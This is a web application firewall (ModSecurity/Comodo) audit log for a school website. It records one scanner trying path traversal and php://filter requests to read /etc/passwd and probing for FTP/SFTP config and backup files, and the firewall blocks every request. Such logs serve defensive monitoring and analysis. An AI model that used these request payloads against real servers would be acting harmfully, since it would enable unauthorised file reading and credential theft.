Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fcb7170-Z-- --1d448337-A-- [01/May/2025:10:26:11 +0700] aBLp04144kZ4LAGlEgzx_gAAANg 103.236.140.4 50998 103.236.140.4 8181 --1d448337-B-- GET /ftp.config HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --1d448337-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d448337-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746069971128600 1534 (- - -) Stopwatch2: 1746069971128600 1534; combined=685, p1=313, p2=348, p3=0, p4=0, p5=24, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d448337-Z-- --743d0500-A-- [01/May/2025:10:26:14 +0700] aBLp1o144kZ4LAGlEgzyBQAAANU 103.236.140.4 51140 103.236.140.4 8181 --743d0500-B-- GET /ftps.config HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --743d0500-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --743d0500-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746069974171484 2408 (- - -) Stopwatch2: 1746069974171484 2408; combined=1048, p1=455, p2=560, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --743d0500-Z-- --4efa7659-A-- [01/May/2025:10:26:14 +0700] aBLp1sVMAgMJpNzaVtKrEAAAAFQ 103.236.140.4 51150 103.236.140.4 8181 --4efa7659-B-- GET /ftp-config.conf HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4efa7659-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4efa7659-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746069974374557 1932 (- - -) Stopwatch2: 1746069974374557 1932; combined=705, p1=316, p2=361, p3=0, p4=0, p5=28, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4efa7659-Z-- --db50e102-A-- [01/May/2025:10:26:15 +0700] aBLp14144kZ4LAGlEgzyDwAAANA 103.236.140.4 51198 103.236.140.4 8181 --db50e102-B-- GET /prevlaravel/sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --db50e102-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db50e102-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069975316335 844 (- - -) Stopwatch2: 1746069975316335 844; combined=306, p1=269, p2=0, p3=0, p4=0, p5=37, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db50e102-Z-- --fb924e71-A-- [01/May/2025:10:26:15 +0700] aBLp14144kZ4LAGlEgzyEgAAANE 103.236.140.4 51208 103.236.140.4 8181 --fb924e71-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --fb924e71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb924e71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069975517617 756 (- - -) Stopwatch2: 1746069975517617 756; combined=289, p1=260, p2=0, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb924e71-Z-- --c08c9900-A-- [01/May/2025:10:26:49 +0700] aBLp-cVMAgMJpNzaVtKrjwAAAEc 103.236.140.4 52808 103.236.140.4 8181 --c08c9900-B-- GET /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --c08c9900-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c08c9900-E-- --c08c9900-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070009673860 2180 (- - -) Stopwatch2: 1746070009673860 2180; combined=626, p1=430, p2=168, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c08c9900-Z-- --fe22a462-A-- [01/May/2025:10:26:49 +0700] aBLp-Sgtr0Qsi1mFAsMJFwAAAIE 103.236.140.4 52818 103.236.140.4 8181 --fe22a462-B-- GET /download_video.php?path=../../../../etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --fe22a462-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe22a462-E-- --fe22a462-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070009875108 2164 (- - -) Stopwatch2: 1746070009875108 2164; combined=620, p1=450, p2=142, p3=0, p4=0, p5=28, sr=98, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe22a462-Z-- --ae9f546a-A-- [01/May/2025:10:26:50 +0700] aBLp-sVMAgMJpNzaVtKrkwAAAEM 103.236.140.4 52832 103.236.140.4 8181 --ae9f546a-B-- GET /index.php?page=../../../../etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --ae9f546a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae9f546a-E-- --ae9f546a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.php?page=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070010077119 1630 (- - -) Stopwatch2: 1746070010077119 1630; combined=427, p1=325, p2=82, p3=0, p4=0, p5=20, sr=52, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae9f546a-Z-- --c122b41f-A-- [01/May/2025:10:26:50 +0700] aBLp-uVeTgVPHjrSAYANKQAAAAM 103.236.140.4 52846 103.236.140.4 8181 --c122b41f-B-- GET /download_gambar.php?path=../../../../etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --c122b41f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c122b41f-E-- --c122b41f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_gambar.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070010279791 1955 (- - -) Stopwatch2: 1746070010279791 1955; combined=593, p1=423, p2=140, p3=0, p4=0, p5=29, sr=73, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c122b41f-Z-- --15df6108-A-- [01/May/2025:10:26:50 +0700] aBLp-uVeTgVPHjrSAYANKwAAABQ 103.236.140.4 52852 103.236.140.4 8181 --15df6108-B-- GET /download_video.php?file=../../../../etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --15df6108-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15df6108-E-- --15df6108-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070010480800 2504 (- - -) Stopwatch2: 1746070010480800 2504; combined=672, p1=467, p2=165, p3=0, p4=0, p5=40, sr=114, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15df6108-Z-- --6ecc8048-A-- [01/May/2025:10:26:50 +0700] aBLp-uVeTgVPHjrSAYANLQAAAA8 103.236.140.4 52866 103.236.140.4 8181 --6ecc8048-B-- GET /download.php?path=../../../../etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --6ecc8048-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ecc8048-E-- --6ecc8048-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070010682824 1496 (- - -) Stopwatch2: 1746070010682824 1496; combined=478, p1=344, p2=105, p3=0, p4=0, p5=29, sr=62, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ecc8048-Z-- --fc928f2f-A-- [01/May/2025:10:26:50 +0700] aBLp-uVeTgVPHjrSAYANMAAAAAI 103.236.140.4 52876 103.236.140.4 8181 --fc928f2f-B-- GET /download.php?file=/etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --fc928f2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc928f2f-E-- --fc928f2f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070010883700 1619 (- - -) Stopwatch2: 1746070010883700 1619; combined=407, p1=301, p2=85, p3=0, p4=0, p5=21, sr=54, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc928f2f-Z-- --775f335f-A-- [01/May/2025:10:26:51 +0700] aBLp-4144kZ4LAGlEgzycgAAAM4 103.236.140.4 52890 103.236.140.4 8181 --775f335f-B-- GET /download.php?file=../../../../etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --775f335f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --775f335f-E-- --775f335f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070011085078 2023 (- - -) Stopwatch2: 1746070011085078 2023; combined=663, p1=491, p2=142, p3=0, p4=0, p5=30, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --775f335f-Z-- --e5fb8347-A-- [01/May/2025:10:26:51 +0700] aBLp-4144kZ4LAGlEgzydQAAAMc 103.236.140.4 52900 103.236.140.4 8181 --e5fb8347-B-- GET /download_worksheet.php?action=/etc/passwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --e5fb8347-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5fb8347-E-- --e5fb8347-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_worksheet.php?action=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746070011286155 2171 (- - -) Stopwatch2: 1746070011286155 2171; combined=597, p1=438, p2=133, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5fb8347-Z-- --4466d710-A-- [01/May/2025:10:33:59 +0700] aBLrp4144kZ4LAGlEgz3qgAAANA 103.236.140.4 44870 103.236.140.4 8181 --4466d710-B-- GET /config.inc.php.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4466d710-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4466d710-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".inc.php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746070439988097 2413 (- - -) Stopwatch2: 1746070439988097 2413; combined=843, p1=414, p2=394, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
